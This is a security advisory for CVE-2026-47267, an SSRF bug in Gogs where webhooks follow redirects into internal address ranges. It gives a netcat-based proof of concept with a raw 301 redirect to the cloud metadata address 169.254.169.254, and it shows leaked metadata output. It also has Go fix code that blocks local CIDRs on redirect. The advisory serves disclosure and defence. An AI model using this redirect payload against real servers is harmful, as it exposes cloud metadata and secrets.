PT-2026-51449 · Go · Gogs.Io/Gogs
Published
2026-06-22
·
Updated
2026-06-22
·
CVE-2026-47267
None
No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.
Summary
The fix for CVE-2022-1285 prevents adding webhooks, or running webhooks, with URLs whose hostname resolves into localCIDRs. However, webhooks still follow redirects, which allows access to hostnames inside localCIDRs.
This was already communicated in the initial report but it looks like there was a bit of a miscommunication.
Details
By creating a webhook pointing to any URL that returns the following response:
HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: close
It is possible to access 169.254.169.254.
PoC
- Run netcat on any server
- Use this server as the webhook URL
- Once you get the request from the webhook (for example by testing it), copy the response above
Results from running this on try.gogs:
{"droplet id":456901166,"hostname":"gogs-do-nyc3-01","vendor data":"Content-Type: multipart/mixed; boundary="===============8645434374073493512=="
MIME-Version: 1.0
--===============8645434374073493512==
MIME-Version: 1.0
Content-Type: text/cloud-config; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config"
#cloud-config
# Enable root and password auth
disable roo...{"dhcp enabled":false,"vpc peering enabled":false},"dotty status":"running","ssh info":{"port":22}}
Impact
Server Side Request Forgery
Fix
The "simplest way" to fix it is most likely to leverage Client.CheckRedirect (https://pkg.go.dev/net/http#hdr-Clients_and_Transports) to check whether the redirect is pointing to a blocked hostname.
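An added example of that fix, not Gogs's own code: an http.Client whose CheckRedirect hook resolves every redirect target and refuses the hop when any address falls in a localCIDRs list. The list contents, the 10-hop cap and the fail-closed handling of lookup errors are assumptions of this example.

```go
package main

import (
	"context"
	"fmt"
	"net"
	"net/http"
	"net/netip"
)

// Block list in the spirit of the localCIDRs check that the CVE-2022-1285 fix
// applies to the initial webhook URL (constructed here, not Gogs's own list).
var localCIDRs = []string{"127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
	"192.168.0.0/16", "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10"}

// isBlockedHost reports whether host (IP literal or name) has any address in localCIDRs.
// Literals need no DNS; a failed lookup blocks; Unmap handles ::ffff:a.b.c.d results.
func isBlockedHost(host string) bool {
	addrs, err := net.DefaultResolver.LookupNetIP(context.Background(), "ip", host)
	if err != nil {
		return true
	}
	for _, a := range addrs {
		for _, c := range localCIDRs {
			if netip.MustParsePrefix(c).Contains(a.Unmap()) {
				return true
			}
		}
	}
	return false
}

// checkRedirect is the http.Client.CheckRedirect hook: it runs before every hop, so
// the report's 301 to http://169.254.169.254/... is refused before it is followed. A
// custom hook replaces the client's default 10-hop limit, so it is re-imposed here.
func checkRedirect(req *http.Request, via []*http.Request) error {
	if len(via) >= 10 {
		return fmt.Errorf("webhook: too many redirects")
	}
	if isBlockedHost(req.URL.Hostname()) {
		return fmt.Errorf("webhook: redirect to %q refused: resolves into localCIDRs", req.URL.Host)
	}
	return nil
}

func main() {
	client := &http.Client{CheckRedirect: checkRedirect} // webhook delivery sends with this
	req, _ := http.NewRequest("GET", "http://169.254.169.254/metadata/v1.json", nil)
	fmt.Println(client.CheckRedirect(req, nil)) // the report's redirect target is refused
}
```

The hook checks the target as resolved at redirect time; a name that resolves differently when the connection is actually dialed (DNS rebinding) is not covered by this check alone and needs the same filtering at dial time.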
SSRF
Affected Products
Gogs.Io/Gogs